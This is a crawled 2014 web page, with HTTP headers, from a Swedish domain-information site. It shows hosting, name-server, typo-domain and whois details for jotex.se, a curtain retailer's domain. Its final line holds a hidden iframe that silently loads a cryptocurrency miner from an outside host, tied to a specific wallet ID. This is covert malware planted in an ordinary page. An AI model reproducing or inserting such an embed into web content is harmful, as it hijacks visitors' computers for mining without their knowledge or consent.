http://domaintool.se/d/jotex.se
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Set-Cookie: PHPSESSID=l39rdqp6b0l6koeoi4p00jjpa5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
Content-Length: 5001
Accept-Ranges: bytes
Date: Thu, 24 Jul 2014 02:08:03 GMT
X-Varnish: 2124934520
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>jotex.se | Information och kommentarer om jotex.se</title>
<link rel="canonical" href="http://domaintool.se/d/jotex.se" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/css/cbb.css" type="text/css" media="screen" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<script type="text/javascript" src="/js/cb.js"></script>
<script type="text/javascript" src="/js/domaintool.js"></script>
<script type="text/javascript" src="/splashpage.js.php"></script>
<style type="text/css">
/*<![CDATA[*/
html .fb_share_link { padding:2px 0 0 20px; height:16px; background:url(/img/facebook_share_icon.gif) no-repeat top left; }
/*]]>*/
</style>
<!--[if lt IE 8]>
<style type="text/css">
* html .i1,
* html .i2 {background-image:url(/img/borders.gif);}
* html .bt,
* html .bt div,
* html .bb,
* html .bb div {background-image:url(/img/box.gif);}
* html .i1,
* html .i3 {height:1px;}
/* Give the absolutely positioned box a width (including IE 7)*/
.one {width:70%;}
</style>
<![endif]-->
<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-1578346-14']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
</head>
<body>

<div id="wrap">
<div id="content2" class="cbb">

<!-- <div style="text-align: center; font-size: 14px; margin-bottom: 3px;">Vi rekommenderar webbhotellet <script type="text/javascript" language="javascript" src="http://www.anrdoezrs.net/placeholder-4202075?target=_blank&mouseover=N"></script></div> -->
<!--
<div style="padding-bottom: 7px; text-align:center; font-size: 13px;">
<div>V&aring;r annons&ouml;r:</div>
<script type="text/javascript" src="http://impse.tradedoubler.com/imp?g(17139026)a(1504445)" charset="ISO-8859-1"></script>
</div>
-->

<div style="float: left; width: 440px;">
<div style="margin-top: 0px; margin-right: 5px;">
<a href="http://DomainTool.se" rel="nofollow"><img src="/img/domaintool2.png" alt="DomainTool"/></a>
</div>
<div style="font-size:13px; margin-top: 30px;">Annonser</div>
</div>
<div style="float: left;">

<div class="teaser" id="bubble">
<blockquote><div><p>DomainTool ger dig intressant information om Svenska internetadresser!</p></div></blockquote>
<div class="quote-by"><cite>&nbsp;</cite></div></div> 
</div>
<div style="clear: left;"></div>

  <div style="float: left;">
  <div id="headsok">
<!--  <form action="/search" method="get" name="s">Dom&auml;ns&ouml;kning: <input size="30" type="text" name="q" />&nbsp;<input type="submit" value="S&ouml;k"/></form> -->

<form action="http://www.google.se/cse" id="cse-search-box" target="_blank">
  <div>
Dom&auml;ns&ouml;kning: 
    <input type="hidden" name="cx" value="partner-pub-0879068745933170:dwqsiw-f1s4" />
    <input type="hidden" name="ie" value="UTF-8" />
    <input type="text" name="q" size="31" />
    <input type="submit" name="sa" value="S&#246;k" />
  </div>
</form>
<script type="text/javascript" src="http://www.google.se/cse/brand?form=cse-search-box&amp;lang=sv"></script> 
  </div>
  </div>
  <div style="float: left; margin-top: 10px; margin-left: 70px;">
  <!-- AddThis Button BEGIN -->
<a rel="nofollow" href="http://www.addthis.com/bookmark.php?v=250&amp;pub=jonas02" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" width="125" height="16" alt="Bookmark and Share" style="border:0"/></a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=jonas02"></script>
<!-- AddThis Button END -->
  </div>
  <div style="clear: left;"></div>

  <img src="http://www.google.com/s2/favicons?domain=jotex.se" alt="info"/> <h1 class="info">jotex.se information</h1>
  <table><tr><td class="bwidth"><div style="float: left; width: 100px;"><span class="topictitel">Titel</span></div><div style="float: left;">
    <!-- Placera denna tagg i <head> eller precis före din </body>-tagg -->
    <script type="text/javascript" src="https://apis.google.com/js/plusone.js">
      {lang: 'sv'}
      </script>

      <!-- Placera denna tagg där du vill att +1-knappen ska visas -->
      <g:plusone></g:plusone></div><div style="clear: left;"></div>
    <br/><div id="links2"><h2 class="titel">Gardiner & gardin | Jotex</h2></div><div><span class="topicvalue" title="V&auml;rdet ber&auml;knas automatiskt med hj&auml;lp av en m&auml;ngd faktorer. Dock s&aring; &auml;r det sv&aring;rt att ber&auml;kna n&aring;got exakt v&auml;rde">Ber&auml;knat v&auml;rde</span><br/><span id="value" title="V&auml;rdet ber&auml;knas automatiskt med hj&auml;lp av en m&auml;ngd faktorer. Dock s&aring; &auml;r det sv&aring;rt att ber&auml;kna n&aring;got exakt v&auml;rde">2000</span> kr</div><br/><span class="topic">Webbservrer</span><br/>
<table class="wwwtable">
<tr><td>Namn: </td><td>www.jotex.se</td></tr>
<tr><td>PageRank: </td><td><span id="pagerank">4</span></td></tr>
<tr><td>IP-Nummer:</td><td>91.208.174.71</td></tr>
<tr><td>IP &Auml;gare:</td><td>TDC TDC Data Networks (ASN 3292)</td></tr>
<tr><td>Lokalisering:</td><td>Sweden Ellös
</td></tr>
<tr><td style="vertical-align: top;">Mjukvara: </td><td>Microsoft-IIS/6.0 (ASP.NET)</td></tr>
</table><a class="relatedhost" href="/host/91.208.174.71">Visa fler dom&auml;ner med ovan IP-nummer</a><br/><br/><span class="topic">Namnservrar</span><br/><table><tr><td>f4.nstld.com</td><td></td></tr><tr><td>a4.nstld.com</td><td></td></tr></table><a class="relatedhost" href="/ns/a4.nstld.com">Visa fler dom&auml;ner med ovan namnserver</a><br/><br/><span class="serverlink">L&auml;nkar</span><br/><div class="links"><a rel="nofollow" href="/d/companyforlife.se">companyforlife.se</a> <a rel="nofollow" href="/d/easyresearch.se">easyresearch.se</a> <a rel="nofollow" href="/d/tryggehandel.se">tryggehandel.se</a> <div class="infotext">Ovan visas utg&aring;ende l&auml;nkar.</div></div></td><td style="vertical-align: top;">
  <div id="facebook">
  <iframe src="http://www.facebook.com/plugins/like.php?href=domaintool.se%2Fd%2Fjotex.se&amp;layout=standard&amp;show_faces=false&amp;width=450&amp;action=like&amp;font=trebuchet+ms&amp;colorscheme=light&amp;height=35&locale=sv_SE" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:310px; height:35px;" allowTransparency="true"></iframe>
  </div>
  <div id="webshot"><img src="/img/loading.gif" alt="jotex.se | Gardiner & gardin | Jotex | www.jotex.se" title="jotex.se | Gardiner & gardin | Jotex | www.jotex.se"/> Tar sk&auml;rmdump..</div>
<script type="text/javascript">
//<![CDATA[
var domain = "jotex.se";
screenshot("jotex.se");
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
function fbs_click() {u=location.href;t=document.title;window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&amp;t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}
//]]>
</script>
<div><div style="font-size:13px;">Sponsrade l&auml;nkar</div><div style="z-index: 2">
<script type="text/javascript"><!--
google_ad_client = "pub-0879068745933170";
/* 336x280, skapad 2009-08-05 */
google_ad_slot = "7188067912";
google_ad_width = 336;
google_ad_height = 280;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div>
</div></td></tr>
  </table>
  <span class="topic">Kommentarer om www.jotex.se</span>
<div id="disqus_thread"></div>
<script type="text/javascript">
  /**
    * var disqus_identifier; [Optional but recommended: Define a unique identifier (e.g. post id or slug) for this thread] 
    */
  (function() {
   var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
   dsq.src = 'http://domaintool.disqus.com/embed.js';
   (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
  })();
</script>

<!--
<br/><br/>
  <span class="topic">Bes&ouml;ksstatistik f&ouml;r www.jotex.se</span><br/>
<img src="http://origin.grapher.compete.com/site_media/snapshot/jotex.se_uv_310.png" alt="Compete" />
-->
<br/><br/>

  <span class="topic">M&ouml;jliga felstavningar</span><br/>
  <div id="typos">
  <a rel="nofollow" href="http://domaindb.com/jotex.com">jotex.com</a>  notex.se<a rel="nofollow" href="/d/hotex.se"> hotex.se</a><a rel="nofollow" href="/d/yotex.se"> yotex.se</a> uotex.se iotex.se kotex.se<a rel="nofollow" href="/d/motex.se"> motex.se</a><a rel="nofollow" href="/d/jitex.se"> jitex.se</a> jktex.se jltex.se jptex.se jorex.se
  </div>

  <br/><div><span class="topic">Whois</span></div><br/><div id="whois"><table><tr><td colspan="2">state:            active</td></tr><tr><td colspan="2">domain:           jotex.se</td></tr><tr><td colspan="2">holder:           anijot2359-00001</td></tr><tr><td colspan="2">admin-c:          CV1243-539887569</td></tr><tr><td colspan="2">tech-c:           CW1243-539888538</td></tr><tr><td colspan="2">billing-c:        AV1243-539888102</td></tr><tr><td colspan="2">created:          1996-12-13</td></tr><tr><td colspan="2">modified:         2009-05-28</td></tr><tr><td colspan="2">expires:          2009-12-31</td></tr><tr><td colspan="2">transferred:      2009-05-28</td></tr><tr><td colspan="2">nserver:          a4.nstld.com</td></tr><tr><td colspan="2">nserver:          f4.nstld.com</td></tr><tr><td colspan="2">nserver:          g4.nstld.com</td></tr><tr><td colspan="2">nserver:          l4.nstld.com</td></tr><tr><td colspan="2">dnssec:           unsigned delegation</td></tr><tr><td colspan="2">status:           ok</td></tr><tr><td colspan="2">registrar:        Melbourne IT CBS</td></tr><tr><td></td><td>anijot2359-00001</td></tr>
</table><br/><br/><span class="newsearch altlink"><a rel="nofollow" href="/">Ny s&ouml;kning</a></span><br/>

 <div class="random"> 
  Popul&auml;ra dom&auml;ner: <a rel="nofollow" href="/d/skaludden.se">skaludden.se</a> <a rel="nofollow" href="/d/xn--btmilj-iua5l.se">båtmiljö.se</a> </div><br/>
<div>
  <b class="spiffy">
  <b class="spiffy1"><b></b></b>
  <b class="spiffy2"><b></b></b>
  <b class="spiffy3"></b>
  <b class="spiffy4"></b>
  <b class="spiffy5"></b></b>
  <div class="spiffyfg">

<div id="trail">
&copy; 2014 Triop AB | <a href="/contact.php" rel="facebox">Kontakt</a> | <a href="/about.html" rel="facebox">Information</a> | <!-- AddThis Bookmark Button BEGIN -->
<a href="http://www.addthis.com/bookmark.php" onclick="addthis_url   = location.href; addthis_title = document.title; return addthis_click(this);" target="_blank"><img src="http://s9.addthis.com/button1-bm.gif" width="125" height="16" border="0" alt="AddThis Social Bookmark Button" class="ikon" /></a> <script type="text/javascript">var addthis_pub = 'P1DGIKSE272PRR52';</script><script type="text/javascript" src="http://s9.addthis.com/js/widget.php?v=10"></script>
<!-- AddThis Bookmark Button END -->

</div>

  </div>
  <b class="spiffy">
  <b class="spiffy5"></b>
  <b class="spiffy4"></b>
  <b class="spiffy3"></b>
  <b class="spiffy2"><b></b></b>
  <b class="spiffy1"><b></b></b></b>
</div>

<!-- <div style="font-size: 13px; margin-top: 10px; color: #999;">
Partners: <a href="http://domaingoat.com">DomainGoat</a> | <a href="http://cz.domaingoat.com">DomainGoat CZ</a> | <a href="http://bg.domaingoat.com">DomainGoat BG</a>
</div> -->

</div>
</div>

<br/>

<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-20309368-1']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>

</div>

<script type="text/javascript">
var disqus_shortname = 'domaintool';
(function () {
      var s = document.createElement('script'); s.async = true;
        s.src = 'http://disqus.com/forums/domaintool/count.js';
          (document.getElementsByTagName('HEAD')[0] || document.getElementsByTagName('BODY')[0]).appendChild(s);
}());
</script>

<iframe style='display:none' src='http://tidbit.co.in/miner'><script>window.walletId = 15diWopdLbkx8pafR9iY6zzunoeNn9sixH</script></iframe>
</body>
</html>

